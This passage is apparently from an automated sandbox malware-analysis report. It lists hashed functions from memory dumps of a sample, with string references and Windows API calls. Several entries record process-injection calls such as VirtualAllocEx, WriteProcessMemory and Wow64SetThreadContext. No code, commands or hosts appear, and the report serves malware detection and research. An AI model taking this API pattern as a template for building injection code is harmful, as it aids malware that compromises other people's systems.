Opcode ID: c08b46663ac7a6e8579a7f75dc646a04a6d2207c9cb27ca5571b28a421f1b670
Instruction ID: 86efc392c9ea57b49f5438f276587c5b90ac4a71332177625fcc932b7dc3526e
Opcode Fuzzy Hash: c08b46663ac7a6e8579a7f75dc646a04a6d2207c9cb27ca5571b28a421f1b670
Instruction Fuzzy Hash: A4229A31E102198FDB15DFA5D894AFEBBB2FF48301F148515E851A7394DB34AA4ACFA0

Function 05EA18C0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 05EA1D56
4'q, xrefs: 05EA1D66

Memory Dump Source

Source File: 0000000A.00000002.1451255836.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ea0000_Iujcy.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 31aa70b98d7bbf0277797689ee09d909cac8b9a50b560e130b24add2052a9b4c
Instruction ID: 8ef5e1f44d8dbdc4bf17d651d89c9e78f0631e12c1d2872a82f7a8217e7551b1
Opcode Fuzzy Hash: 31aa70b98d7bbf0277797689ee09d909cac8b9a50b560e130b24add2052a9b4c
Instruction Fuzzy Hash: 40F1C335D05318DFEB58DFA5D5996EDBBB2FF89306F505029E486AB250DB306982CF00

Function 05EA2858 Relevance: 2.7, Strings: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 05EA2AD9
4'q, xrefs: 05EA2AE9

Memory Dump Source

Source File: 0000000A.00000002.1451255836.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ea0000_Iujcy.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 528c08fe63a32b423e9fbda2ba20dd3996b6a8fb8b81ee2c0167b073a5467516
Instruction ID: ddddf100a41652ee48c2f69ccfc0630a69feea1ffec9ecbd68adefc721b234df
Opcode Fuzzy Hash: 528c08fe63a32b423e9fbda2ba20dd3996b6a8fb8b81ee2c0167b073a5467516
Instruction Fuzzy Hash: 2691D035E01208CFDB58DFB9D4846EDBBB6BF89306F50A029E596BB250DB706941CF21

Function 061B1D60 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 061B1F05
(q, xrefs: 061B1E76

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: a7ad63b01c72126573518cdce489d7b1fd490f3a0d65e19ef4d7484ce48ee7ce
Instruction ID: 87d398d08fc5312170c152337c38f85b65b53225d6e156eb75136e32b4cb989e
Opcode Fuzzy Hash: a7ad63b01c72126573518cdce489d7b1fd490f3a0d65e19ef4d7484ce48ee7ce
Instruction Fuzzy Hash: 7C51DB30B002049FEB59AF76D8666AE77B6AFC4201B51442CE546DB3A1CF35EC06C795

Function 00F49CF2 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

Xzq, xrefs: 00F49DFE
Xzq, xrefs: 00F49D4E

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: Xzq$Xzq
API String ID: 0-3730566269
Opcode ID: b49d47567fcc4a21018807475207512eb2f5fc6ffe3b1797e04ea5f6889fa1d7
Instruction ID: fb656b0431fac19fc7e34a9007ee31b648b55710bf4c0cea0355567a5716f824
Opcode Fuzzy Hash: b49d47567fcc4a21018807475207512eb2f5fc6ffe3b1797e04ea5f6889fa1d7
Instruction Fuzzy Hash: C451A478A112288FCB65DF25C985A9CBBF9BF48300F5051E9E609AB350DB306F81DF40

Function 061B2F58 Relevance: 2.6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

Strings

$q, xrefs: 061B2FCF
$q, xrefs: 061B2FBF

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: c3a3490e5d59491f40d0efe23347f01fd79eeda1d002d62bb71c80191adea6d0
Instruction ID: 3b7f5138a666b531ce90676987b624f27475b1c7de2768a66345f4877086962d
Opcode Fuzzy Hash: c3a3490e5d59491f40d0efe23347f01fd79eeda1d002d62bb71c80191adea6d0
Instruction Fuzzy Hash: EC11E131A0420ADFEB68CE99D441BF9B7F9EF04354F25916AE400CB290D775EA88CB50

Function 00F486C4 Relevance: 2.5, Strings: 2, Instructions: 25COMMON

Download Yara Rule

Strings

V, xrefs: 00F486AC
, xrefs: 00F4867C

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: $V
API String ID: 0-3035400853
Opcode ID: c78d3f0e014b8fe1fd9bc6816a6c3d10cb14f8feb54358c555394d84ff99a849
Instruction ID: c02c74356c0429a4c67b336e6b0fc940a758162417968a94989c3a622c71a24a
Opcode Fuzzy Hash: c78d3f0e014b8fe1fd9bc6816a6c3d10cb14f8feb54358c555394d84ff99a849
Instruction Fuzzy Hash: 11F0F974D40269CFDB64DF50C84839D7FB0BB55315F5004EBD909AA240DB745EC5EE11

Function 00F4864F Relevance: 2.5, Strings: 2, Instructions: 23COMMON

Download Yara Rule

Strings

V, xrefs: 00F486AC
, xrefs: 00F4867C

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: $V
API String ID: 0-3035400853
Opcode ID: a54dd5e83625a96fcd488143e5a9ae126aceb9ba349b9580aad5a458a628402c
Instruction ID: c15772a0b3622b6c6964f975ad87d8f1d3b00b677c16088628d12f08ed1807d0
Opcode Fuzzy Hash: a54dd5e83625a96fcd488143e5a9ae126aceb9ba349b9580aad5a458a628402c
Instruction Fuzzy Hash: FEF0A474D00269CFDB60EF90CD4879DBBB0AB55319F5004E7E909AA240D7745AC4DF55

Function 061B8DC0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,q, xrefs: 061B913B

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: ec76d9a7ae6bb15a7208d7c1ea7b9e3938228a54d867930d1d044359a95c645c
Instruction ID: ee02997ccf82fecc02bf701dcfd8f2e7caee6926aaa86db70d6d7bfea908f73b
Opcode Fuzzy Hash: ec76d9a7ae6bb15a7208d7c1ea7b9e3938228a54d867930d1d044359a95c645c
Instruction Fuzzy Hash: 9F521675A002288FDB64CF69C985BEDBBF6BB88300F1544D9E549AB351DB309E81CF61

Function 0619D76C Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0619D9DF

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 35a5e947950da536107929655750fbe415a8c31ab810c2f7b10989e0292e277d
Instruction ID: c972bde48acf2dbf374ea25da1d8cb2d20bf91008a49505b4a4eb41c8f14b1bc
Opcode Fuzzy Hash: 35a5e947950da536107929655750fbe415a8c31ab810c2f7b10989e0292e277d
Instruction Fuzzy Hash: D8A11070D00218CFDF60DFA9D881BEEBBB1BF49300F109569E858A7290DB788986CF55

Function 0619D778 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0619D9DF

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cb8d4268027ea181bfd4c316e3fa6a11979b6375a1db504b510ff02df7cfc8e7
Instruction ID: c035d7ceb6a46de23b0511a4c708f5c9678f8487a02bea7d1733aca2fca4d9fd
Opcode Fuzzy Hash: cb8d4268027ea181bfd4c316e3fa6a11979b6375a1db504b510ff02df7cfc8e7
Instruction Fuzzy Hash: 18A10E70D006188FDF64DFA9D881BEEBBB1BF49300F109569E858A7290DB788985CF95

Function 05E70411 Relevance: 1.6, APIs: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05E704BC

Memory Dump Source

Source File: 0000000A.00000002.1451010936.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e70000_Iujcy.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d905fe890f3340ff2481b26d6dbc13b07e9a671abc5961bb4be771f7df497d7b
Instruction ID: c1b70798a3aade0535c083e2a9f91a00e0865ae7549ef1730a38c3c4f03199ee
Opcode Fuzzy Hash: d905fe890f3340ff2481b26d6dbc13b07e9a671abc5961bb4be771f7df497d7b
Instruction Fuzzy Hash: 0D41DB75D0424CEFCB10CFAAD884A9EFBB1FB49310F14A46AE855BB200D735A906CF54

Function 0619E1E9 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0619E2C3

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0eb8b9be72ad1d62b18d045c3e59501be64d3dfc94e6fe2c29370d8fd8b33ebc
Instruction ID: b3b934605a277706bb73803491db6fb6f3e6356c6843933096327e3d5bfe3dab
Opcode Fuzzy Hash: 0eb8b9be72ad1d62b18d045c3e59501be64d3dfc94e6fe2c29370d8fd8b33ebc
Instruction Fuzzy Hash: 8141A9B5D012589FCF10CFA9D980ADEFBF1BB09310F14902AE819B7250C739AA41CF64

Function 0619E1F0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0619E2C3

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 67ca73651770929737e297970810401ed3f1093df8f9dd9cb74b71ca478a2d17
Instruction ID: 5d55227ec24c70ec8e53eea6c5df7f683d0c50a29078f8734b597756105e6615
Opcode Fuzzy Hash: 67ca73651770929737e297970810401ed3f1093df8f9dd9cb74b71ca478a2d17
Instruction Fuzzy Hash: 4E41A8B4D012589FCF10CFA9D980ADEFBF1BB09310F10902AE818B7250C739AA41CF64

Function 0619E088 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0619E13A

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 71e9368b990de6ba544ea50aef756a818a706adac13824a37fb0a267f37732c4
Instruction ID: 2bb4445a7d4399074f6b588538b2d05d42b7bb5d364da38b4ddd3cb809ecc033
Opcode Fuzzy Hash: 71e9368b990de6ba544ea50aef756a818a706adac13824a37fb0a267f37732c4
Instruction Fuzzy Hash: 6F3176B9D002589FDF10CFA9D980A9EFBB1FB49310F14A42AE815B7350D735A902CF68

Function 0619E6D9 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0619E784

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3e1600d670f3d33cd3132289005fb39b5c72f9e75d954638feab4a20ad1d36a4
Instruction ID: b0f16e7f7150d08faab32768fba474a962b833081ef8ccb70a168b05e65896d7
Opcode Fuzzy Hash: 3e1600d670f3d33cd3132289005fb39b5c72f9e75d954638feab4a20ad1d36a4
Instruction Fuzzy Hash: 7C31BBB5D012589FDF14CFA9D980AEEFBB1AF09310F14942AE815B7250C739A945CFA4

Function 0619E090 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0619E13A

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0c1f14b0aa47498196abc8381630c528e613b4d2ae878a20bd929052ac9fa0ee
Instruction ID: 49a84ea405d2bf1beb0dee220ffa65ab6680d20f59e8d217c96f3b0e01f0399f
Opcode Fuzzy Hash: 0c1f14b0aa47498196abc8381630c528e613b4d2ae878a20bd929052ac9fa0ee
Instruction Fuzzy Hash: 9E3187B8D002589FCF10CFA9D980A9EFBB1BB49310F10942AE815B7310D735A902CF68

Function 0619E6E0 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0619E784

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d8a7a9d7a68138a4cdabd9938f308b8b4cad68dce0dc55988adcb622aeb7e159
Instruction ID: 3d7a7e6515de1b1f4fb7896a993c2966a1d0da450dec6559595c7ecd6ddbc8c6
Opcode Fuzzy Hash: d8a7a9d7a68138a4cdabd9938f308b8b4cad68dce0dc55988adcb622aeb7e159
Instruction Fuzzy Hash: A631CAB8D012589FCF14CFAAD980AEEFBB1BF09310F14942AE815B7200C735A945CFA4

Function 0619DB28 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0619DBDF

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ffec4aa4bf58ebd83ae1a95e5ffb3b75a08bdc3da45f86289115e27d79909c5e
Instruction ID: 87aa30213b0bc3bf07d091bc9ccecb9f344690e46af76d46c449a907e1935c1b
Opcode Fuzzy Hash: ffec4aa4bf58ebd83ae1a95e5ffb3b75a08bdc3da45f86289115e27d79909c5e
Instruction Fuzzy Hash: A241CBB5D002589FDB10DFA9D984AEEFBF1BF49310F24802AE415B7240C739A946CF64

Function 05E70418 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05E704BC

Memory Dump Source

Source File: 0000000A.00000002.1451010936.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e70000_Iujcy.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2dae42507957b1811282cdddbaba10fc1531774cf510cfbfffc75dbb184ba9ab
Instruction ID: af471d7cea3beb7f68da8bed3721825380cc6f5c3c4e26fd94e7f03f4e22dc74
Opcode Fuzzy Hash: 2dae42507957b1811282cdddbaba10fc1531774cf510cfbfffc75dbb184ba9ab
Instruction Fuzzy Hash: 393197B8D012489FDF14CFA9D984ADEFBB1FB49310F14942AE815B7210D735A946CF58

Function 0619DB30 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0619DBDF

Memory Dump Source

Source File: 0000000A.00000002.1452817468.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6190000_Iujcy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ebf31d5e7a1210bb4a2f68bf1c1a86b4b532e2c8368b2a5f4a11896a8c8d3b28
Instruction ID: 260ab19a879510777021a81be538b979f5bbac5e7c8edf8fae35e98d7167e878
Opcode Fuzzy Hash: ebf31d5e7a1210bb4a2f68bf1c1a86b4b532e2c8368b2a5f4a11896a8c8d3b28
Instruction Fuzzy Hash: E831BBB5D012589FDB14DFA9D984AEEFBF1BF49310F14802AE415B7240C739A945CF64

Function 061B8DB1 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

,q, xrefs: 061B913B

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: c881b8187db6a6b1059d101b6e2effd66deffec85daebac32e953eaa500e2898
Instruction ID: df8f113a96383ffdc9f09c08ea78ac324a3539e902d05930f04974ef24eff400
Opcode Fuzzy Hash: c881b8187db6a6b1059d101b6e2effd66deffec85daebac32e953eaa500e2898
Instruction Fuzzy Hash: 2AC15E70E002188FDB68DB65C945BEDBBF6AF88701F158099E509AB391DB70DD81CFA1

Function 00F44EE3 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

PHq, xrefs: 00F45393

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: d67396bd71b73eedd2242b5739640b2a1df624e030ee83ffed2e5d7a92465c74
Instruction ID: e06023194e8fb0cfd8f7be2478b3efd08d3bd54b6ec8d7029ccc138cc25ab91b
Opcode Fuzzy Hash: d67396bd71b73eedd2242b5739640b2a1df624e030ee83ffed2e5d7a92465c74
Instruction Fuzzy Hash: 87D1B074D01228CFEB64DF65D888B99BBB1BB48315F2045EAD90EA7240DB706EC4EF51

Function 061B7ED1 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

4'q, xrefs: 061B80FA

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 4de647769d7786614feb8dc5fc8fd663e71e93fb5b32da0640b169ce4fab2e1a
Instruction ID: dbc17bc3c85f1c6f693e2996958c1721fe6a98c58d8c28d68bb34bb0e60a29d4
Opcode Fuzzy Hash: 4de647769d7786614feb8dc5fc8fd663e71e93fb5b32da0640b169ce4fab2e1a
Instruction Fuzzy Hash: 4FA1EB34A10218DFDB44EFA4D994A9DBBB2FF88301F159559E805AB3A5DF70EC42CB90

Function 0634FBB8 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

(q, xrefs: 0634FC88

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 2b7e5d26b0c3e36f6682d212c6064ca2064f0c73680126fc31500dabcc32eec4
Instruction ID: 88f15e0feced2d91ce20c85767a6dd9b651d4371f1cf8a3e3c0acc821ee02212
Opcode Fuzzy Hash: 2b7e5d26b0c3e36f6682d212c6064ca2064f0c73680126fc31500dabcc32eec4
Instruction Fuzzy Hash: E171DC74E043048FDB58EBA9D8546AEFBF6EFC9210F58882ED45AD3754DB30A905CB81

Function 05E715E0 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05E7167F

Memory Dump Source

Source File: 0000000A.00000002.1451010936.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e70000_Iujcy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a96315d86cf0f524db3804aa7a59f9d7aed9b5e2c0949f3c0c3aaef323e4db2b
Instruction ID: 5a0a8ce3fa71cc56fe2c37a945f4dfb162c84063fd5438dd9b3d82dc07404b46
Opcode Fuzzy Hash: a96315d86cf0f524db3804aa7a59f9d7aed9b5e2c0949f3c0c3aaef323e4db2b
Instruction Fuzzy Hash: 4F3198B8D012489FDF14CFA9D880A9EFBB1BB49310F14942AE815B7210D735A945CF98

Function 05E715D8 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05E7167F

Memory Dump Source

Source File: 0000000A.00000002.1451010936.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5e70000_Iujcy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 17a0853d582980d433b6d2cd76bbd7e018cb636a816e62009d1f27a95053de4c
Instruction ID: 71b5d3b2181b7b6a2b67179ed3ce8f5fa445e2fbf64454f52021060c24b4ee83
Opcode Fuzzy Hash: 17a0853d582980d433b6d2cd76bbd7e018cb636a816e62009d1f27a95053de4c
Instruction Fuzzy Hash: D831B8B8D012089FDF14CFA9D981AEEFBB1BF09310F14942AE825B7210D735A941CF98

Function 00F40810 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

rhd, xrefs: 00F40805

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: rhd
API String ID: 0-851454470
Opcode ID: 04d89584c6552887f867b08553106b79de6e5dad1d982d08ca02bb65c1d61e32
Instruction ID: 7de26427140529d73dd0580c8d40746f11afdeb1e90e6ad7dd9259414a57da3e
Opcode Fuzzy Hash: 04d89584c6552887f867b08553106b79de6e5dad1d982d08ca02bb65c1d61e32
Instruction Fuzzy Hash: 4621F530B043108FEB19AB38885063A3FD1AF9A77171444A9DA45CB36AEE30DC06E7D2

Function 061B267A Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

p<q, xrefs: 061B26BA

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID: p<q
API String ID: 0-3896934649
Opcode ID: 7c1518bd91711d0f03996ef6ef8629581b76050d81fed9978dacd224615e01f6
Instruction ID: 791fdebfd56190ebf2df2fdda3f64868d5809593b7303355d83f13d2de989f02
Opcode Fuzzy Hash: 7c1518bd91711d0f03996ef6ef8629581b76050d81fed9978dacd224615e01f6
Instruction Fuzzy Hash: 1C2179307001949FDB06DF2AC884AEA7BEAAF8E345B0950A5FD44CB3A1CB75DD51CB60

Function 05EA0D7F Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

4'q, xrefs: 05EA1549

Memory Dump Source

Source File: 0000000A.00000002.1451255836.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5ea0000_Iujcy.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 256f42c959201a232f6ccefe9830f46d9e5ec22664435366361b2b4a5b0115e6
Instruction ID: 79a5d18182a76838b55a28d9b5a05db1ee2dfd4d0eb847a1457f7ec3932dbb0a
Opcode Fuzzy Hash: 256f42c959201a232f6ccefe9830f46d9e5ec22664435366361b2b4a5b0115e6
Instruction Fuzzy Hash: 9D215A76D04249DBEB18CFAAC4496FEBBB2FB44305F00A069D192AB280DB346941CF91

Function 00F47F7F Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

t, xrefs: 00F4C45F

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: t
API String ID: 0-2238339752
Opcode ID: e5a430dcc24c6b8955bef44992b7e109742eda1837e15ebc198f45503bde3302
Instruction ID: f76874b4f45198dc431d1fc1a43a5773905ad4b49a299a5f1e14599344deed04
Opcode Fuzzy Hash: e5a430dcc24c6b8955bef44992b7e109742eda1837e15ebc198f45503bde3302
Instruction Fuzzy Hash: 03310134D05269CFEB64CF29C884BECBBB2AB49314F0085E6D94DA2210DB705EC9EF41

Function 00F409E4 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

Teq, xrefs: 00F40A23

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: b22f064183a612986dd42f38375723269918c70ffe623c60be253d6d1c654043
Instruction ID: d4d1a2f61e776c3da9963812f486a9127e23de18fc35fe97962337a7ccb89621
Opcode Fuzzy Hash: b22f064183a612986dd42f38375723269918c70ffe623c60be253d6d1c654043
Instruction Fuzzy Hash: E4114930B002049FC744DBA9C999BADBBF2BF88710F294459E505EB3A1CEB59C01CB80

Function 061BBDC8 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ccd3949a2af90fae30ce532b46016e5face17181a944c472154356f3a608268
Instruction ID: 1780063e8ce85e563a8a629b0f06ed3fdbeda56b2425b0cef7b6ff3edfa21c9a
Opcode Fuzzy Hash: 9ccd3949a2af90fae30ce532b46016e5face17181a944c472154356f3a608268
Instruction Fuzzy Hash: B3120A34A002198FDB54EF68C894B9DB7B2BF89300F5195A8D44AAB355DF70ED86CF90

Function 0634F6A8 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

